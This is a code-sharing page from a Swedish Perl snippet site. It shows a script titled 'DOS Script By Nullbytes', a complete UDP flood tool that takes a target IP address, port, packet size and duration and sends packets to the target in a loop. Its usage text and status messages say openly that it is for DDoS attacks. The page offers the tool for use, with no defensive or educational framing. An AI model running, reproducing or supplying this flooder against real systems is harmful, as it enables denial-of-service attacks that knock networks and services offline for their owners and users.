DOS Script By Nullbytes

Skapad 4 år sedan, skriven i Perl, med 409 visningar.
URL http://kod.perl.se/view/c5c4380a Bädda in
Ladda hem koden eller visa koden i råformatVisa bredare version
 1. #!/usr/bin/perl
 2.  
 3. # Script by #NullBytesAlpha
 4. use Socket;
 5. use strict;
 6. print <<EOTEXT;                        
 7.  _____     _ _ _____     _           ____  ____  _____ _____
 8. |   | |_ _| | | __  |_ _| |_ ___ ___|    \|    \|     |   __|
 9. | | | | | | | | __ -| | |  _| -_|_ -|  | ||  |  |  |  |__   |
 10. |_|___|___|_|_|_____|_  |_| |___|___|____/|____/|_____|_____|
 11.                     |___|                                    
 12. EOTEXT
 13. if ($#ARGV != 3) {
 14.   print " \n";
 15.   print " - * NullBytesDDoS // by NullBytes\n\n";
 16.   print " - * Order: flood.pl <IP-address> <Port> <Packets> <Time (In seconds)>\n";
 17.   print " - * Port: Port to flood. Set to 0 for all.\n";
 18.   print " - * Packets: The number of packets to send. Between 64 and 1024.\n";
 19.   print " - * Time: Flood time in seconds.\n";
 20.   print " - * ";
 21.   exit(1);
 22. }
 23.  
 24. my ($ip,$port,$size,$time) = @ARGV;
 25.  
 26. my ($iaddr,$endtime,$psize,$pport);
 27.  
 28. $iaddr = inet_aton("$ip") or die "Es konnte keine Verbindung hergestellt werden mit $ip !\n";
 29. $endtime = time() + ($time ? $time : 1000000);
 30.  
 31. socket(flood, PF_INET, SOCK_DGRAM, 17);
 32.  
 33.  
 34. print "$ip wird nun geddost Port:" . ($port ? $port : "random") . " mit " .
 35.   ($size ? "$size-byte" : "random size") . " paketen" .
 36.   ($time ? " Noch $time Sekunden" : "") . "\n";
 37. print "Abbrechen mit Ctrl + C\n" unless $time;
 38.  
 39. for (;time() <= $endtime;) {
 40.   $psize = $size ? $size : int(rand(1500-64)+64) ;
 41.   $pport = $port ? $port : int(rand(65500))+1;
 42.  
 43.   send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

Svara på "DOS Script By Nullbytes"

Här kan du skriva ett svar till kodsnutten ovan